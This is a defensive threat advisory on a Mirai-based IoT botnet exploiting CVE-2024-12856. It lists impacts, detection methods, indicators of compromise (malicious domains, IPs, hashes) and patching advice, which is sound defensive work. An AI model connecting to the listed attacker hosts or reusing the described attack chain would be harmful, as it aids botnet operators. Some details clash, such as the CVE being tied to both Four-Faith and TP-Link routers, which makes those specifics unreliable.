Mirai-Based Botnet Leveraging N-Day and Zero-Day Exploits
September 10th, 2025
High
Our Cyber Threat Intelligence Unit has identified an active Mirai-based botnet campaign that is rapidly expanding across Internet-exposed IoT and network devices. This botnet spreads through weak Telnet credentials and multiple unpatched vulnerabilities, including the zero-day CVE-2024-12856. Successful compromise allows devices to be remotely controlled for DDoS attacks, cryptomining, and further malware deployment. This attack demonstrates advanced evasion and persistence techniques, including obfuscation, sandbox evasion, and automated restarts if terminated. These advanced techniques coupled with leveraging zero-day exploits makes detection and removal particularly difficult. With thousands of infected nodes observed globally and confirmed targeting of industries such as manufacturing, technology, and media, this Mirai botnet poses a serious ongoing global threat. Organizations are strongly advised to patch firmware, change default credentials, restrict public exposure, and closely monitor IoT network activity.
Technical Details
Vulnerability ID: CVE-2024-12856.
Type: OS Command Injection (Remote Code Execution).
Severity Level: High (CVSS v3 score: 7.2).
Attack Vector: Remote via HTTP
Authentication Required: Yes (default credentials allowed unauthenticated execution)
Privileges Required: High (admin-level), but default credentials can allow unauthenticated exploitation.
Vulnerable Components: Four-Faith industrial routers (models F3x24, F3x36), firmware version 2.0.
Root Cause: Lack of input validation in the system time modification API.
Impact
Device Compromise and Full Control: Successful exploitation (including CVE-2024-12856) allows attackers to execute arbitrary commands and gain root-level access, leading to complete takeover of the affected devices.
Botnet Enrollment and Persistence: Once compromised, devices are integrated into a Mirai-based botnet. The malware disables competing threats, ensuring persistence and maximizing control over infected systems.
DDoS Capabilities: The primary function of the botnet is to launch large-scale Distributed Denial-of-Service (DDoS) attacks, potentially resulting in prolonged service outages, operational disruption, and reputational damage to targeted organizations.
Secondary Malware Deployment: Infected devices may also be leveraged to deploy additional malicious payloads, such as cryptominers (e.g., XMRig), which consume system resources and degrade performance.
Widespread Industry and Geographic Exposure: The campaign has affected industries such as manufacturing, technology, media/communications, and construction, with infections reported across multiple countries, including Brazil, France, Germany, Israel, Mexico, Switzerland, the U.S., and Vietnam.
Operational and Security Risks: Beyond direct exploitation, infected devices may experience network instability, bandwidth exhaustion, and reduced functionality, while also serving as potential pivot points for deeper compromises within enterprise environments.
Detection Method
Device Manipulation: Malicious code may try to change or delete system files on IoT devices to weaken security. It can rapidly terminate other processes to take full control.
Detection: Monitor for unexpected file changes, rapid process kills, or high CPU/memory usage.
Network Abuse: Infected devices may send large volumes of traffic to unusual ports or servers. They may also scan the internet to locate more vulnerable devices.
Detection: Use firewall and traffic monitoring to spot abnormal traffic spikes, repeated scans, or communication with suspicious servers.
Exploitation Attempts: Exploits can be used to take advantage of known vulnerabilities (like CVE-2024-12856 in TP-Link routers). Malicious commands (like wget, curl) may be injected through router or camera web interfaces.
Detection: Apply IDS/IPS signatures and HTTP request monitoring for suspicious exploit activity.
Evasion Techniques: Malicious binaries may be packed in unusual ways (e.g., modified UPX) to avoid analysis. Frequent changes in filenames, domains, and configurations may be used to stay hidden.
Detection: Use endpoint security and sandboxing to flag strange binaries or frequent config changes.
Full Attack Chain Monitoring: The process usually follows this path: Exploit vulnerability → Install malware → Connect to C2 server → Launch DDoS attacks.
Detection: Correlate logs across layers (device, firewall, IDS) to see the full attack flow. Any IoT device making unexpected external connections should be treated as suspicious.
Indicators of Compromise
Type | Indicators |
Domain | cross-compiling[.]org |
Domain | i-kiss-boys[.]com |
Domain | furry-femboys[.]top |
Domain | twinkfinder[.]nl |
Domain | 3gipcam[.]com |
IP Address | 141[.]11[.]62[.]222 |
IP Address | 149[.]50[.]96[.]114 |
IP Address | 220[.]158[.]234[.]135 |
IP Address | 78[.]31[.]250[.]15 |
IP Address | 5[.]182[.]206[.]7 |
IP Address | 5[.]182[.]204[.]251 |
Hash | 1940296f59fb5fb29f52e96044eca25946f849183ceda4feb03e816b79fbaa81 |
Hash | 269259e5c2df6b51719fd227fa90668dd8400d7da6c0e816a8e8e03f88e06026 |
Hash | 87b6917034daa6f96f1f3813f88f2eb6d5e5c1b8f6b5b9ab337ab7065d4cb4c0 |
Hash | ca93203a9b795ffa66e5949e1ef643314bc3f3a3db4bed551ecd1c1e20b06089 |
Hash | 26375b74e64d786ebc769cfd04e75eebec3b100da3637976e433a67ffa0cac79 |
Hash | 2bfe2748bc594614dd03577053b58a5fb9fb8a6182fecc2025f1b715554d7fe1 |
Hash | 39fdef9339c75723d865481283f3d4566f78969743eef38061beddcbf5a2690d |
Hash | 7eee9ad9bb0154c8e60201f3dbfe3cff84692f95f0515c6c66fab7240e864b64 |
Hash | ed3f85e537ada33c5f3b1f09b5df6e8b4345514e920f7e75fc0a6535b7e4a352 |
Hash | 728dbb47e10a245b612453b8f9aaf3fb125760691d5f0397b01da2190f2e9709 |
Hash | 9cc814ac2e15d1405fb4d35cb72d6341c0df8ae26741d1b08a243f236ef4f531 |
Hash | e764413c5ed6a9dba0d69b95a15841fb9b867f7aab3be7600381547eb5c2c1ab |
Hash | 400cc665fd3f23a6ca7a88c4c0f8cbb4f64b7a950786f202acc64623a8e452d7 |
Hash | b83b1484cf9dc6fe34a7d100c0ee582eaa2917f50bca1f7f9da7891698e3bedb |
Hash | 57861ee774b1ff56035f62e48590ce16246f484503bd0670c597ea102679d86b |
Hash | 737a795bfb19059062ee2f0a7b2ea0e88283413e76d1b796782423006f3b2cdf |
Hash | 7fda54c9a489fea2dc8f7248d7bf72e1e356e47366478c0d5f4ba421dddf4ab7 |
Hash | 01c0a184c145ee382174937bb891bff90b3d574ee0616f40b3eb3ccfb68ba786 |
Hash | c3862c9b2d85c74dc5b2e38c600474e8df92677c064973b0a464a1aaa12f607e |
Hash | 9f77b86621c7cec885ab89a3dcf0548a7ee17c8c88f66780dfc7dcb2a13da146 |
Hash | e85291d70a144ebe2842aeba2c77029762ca8ebfd36008b7bb83cda3e5d5d99d |
Hash | dd0c9a205b0c0f4c801c40e1663ca3989f9136e117d4dcb4f451474ceb67c3da |
Hash | 6ca219e62ca53b64e4fdf7bff5c43a53681ed010cbaa688fa12de85a8f3de5e7 |
Hash | 0672a9aebc7597eef44490f40c42e203d5ddfebc9300b62f38b0d1312a852235 |
Hash | 47785b773808d7e1d2f1064b054e7e13b8b2ce9a35c68b926cd32c006c78f655 |
Hash | 48d2c2c68fa0bd44eb70c1a6cf572406442b289fb6030e946f0530ce6f9fad98 |
Hash | 5a2d60ab5d281e0118603cc793f49f7e95a87de959a25bb3275c09ec8e8762e5 |
Hash | 92f9bcf6c55008c60013b75b49e143a1c9673e838efe0971490d19a241146fe5 |
Hash | 915ee7620406946b859dd4a00f9862d77fba8b452aebee5d94587e66c1085c88 |
Hash | e597b492a88f0524ea38121e6b8230d9515a82ea8ca28cdcc64413c33ed846c9 |
Hash | fed7a3cec01cad14d9a46804b43e64a8021e89d8d38a49a700cf8c2e0c2578f6 |
Hash | bcdbeb7eeb64d6daf5aa6e13f1f70acfe057df50ec4773f434ffab684b78aead |
Hash | 282ada9a29a5f3144114373ef3c5826bcc8fb5018cd0f2ecb97d2a7bee1df296 |
Hash | bba29011e0b51eb0907735933641c226f3441f79a8e49ab6047c1625dd0b5176 |
Hash | 08a4bd4758e4cbf39fff22a0cc5fb28d9bdd9944a0cd2120fdbe9222aaecbcf4 |
Hash | f99b33bd086f9b331a0df40525a45326bb977fee5272111edaffbe4be56e78fa |
Hash | 49b1a220b9a7450e151f19eec3da496b26799612811e512d138da88e0ee596bc |
Hash | 493e33d9ade8781e93fe9cd982de42a8032d2fc6b07baf5b202e0761a0fbe89d |
Hash | ac14a60064081215f5a308ebeb6de69d67e6cb52ebb38d60fef99137fc1ea93a |
Hash | 7863ba5267cb187ba3892060f3868dca8b0dfae712649a650847e22d47ccb60a |
Hash | 58af5c340d271ac41f4a6009281466c7ad996b1a029a27b88f03e5ec6d95c54b |
Hash | b03cf96cf2583ea45e4c13833e7201c2c55b96a4931a909925624913e9ad8d33 |
Hash | b979fb79cf120f5d8789adb25fc016816c68e6d52bdc5749c817f4386e0c32da |
Hash | 77df7c3d6d364474d411845fa185b196dcda437134f7093126a3f3bd145bdeee |
Hash | 228b3f006d63b8d75dcb8f66951cbf75e2a4ebdf13af9e2f47ad1c1a9b2e5753 |
Hash | 2c758b1eac4fda920f90c459b773e7c3017e90f9049502b41d8b5391a8b61621 |
Hash | 834d7c6bb4fd6b5da03e36fed96d7a828342d7e8bf27222b17f9f39bc6aaed80 |
Hash | 05cfcef1273063c0c8b0eadf429e850471223bc2403a7cc943c252306d72e561 |
Hash | fbc42240f07235d3a0290f3e82a06ef4376e845973c146e423f8de4913a1cce4 |
Hash | 82b221177f2e31052245d761e9aca47a511ae3ee9d6602ddb1f9b5be25745638 |
Hash | 1b6deb5f47ebfe3a0cbb35751f3df6a893c6570cb7863c74e4262397edd6552e |
Recommendations
Update Devices: Patch all IoT and network devices to the latest firmware, especially those affected by CVE-2024-12856.
Block Internet Exposure: Do not expose IoT devices directly to the internet; use firewalls or VPNs.
Use Strong Passwords: Remove default/weak credentials and set unique, strong passwords.
Monitor Traffic: Watch for unusual outbound connections or DDoS-related activity.
Turn Off Unused Services: Disable Telnet, SSH, or other remote access features if not required.
Plan for Incidents: Have a DDoS mitigation plan and test your response process.
Replace Old Devices: Retire unsupported or outdated IoT hardware that no longer receives updates.
Conclusion
A Mirai-derived botnet has resurfaced with enhanced capabilities that dramatically raise the stakes for IoT security. It leverages both known (N-day) and zero-day vulnerabilities, most notably CVE-2024-12856 - to compromise routers and embedded devices from vendors such as DrayTek, TP-Link, Four-Faith, Raisecom, and Cisco. With over 15,000 active nodes, This botnet has orchestrated DDoS attacks on targets including researchers and deployed cryptomining payloads like XMRig. Its advanced evasion tactics include custom file naming, UPX header modification, sandbox detection, and modular behaviors (Monitor, Watchdog, Attacker, Killer). The botnet’s global footprint spans countries in the Americas, Europe, and Asia, impacting critical sectors like manufacturing, technology, construction, and media. This evolution underscores the urgency for organizations to adopt proactive, intelligence-driven defenses, such as immediate patching, credential hardening, network segmentation, and IoT monitoring - to guard against this escalating global threat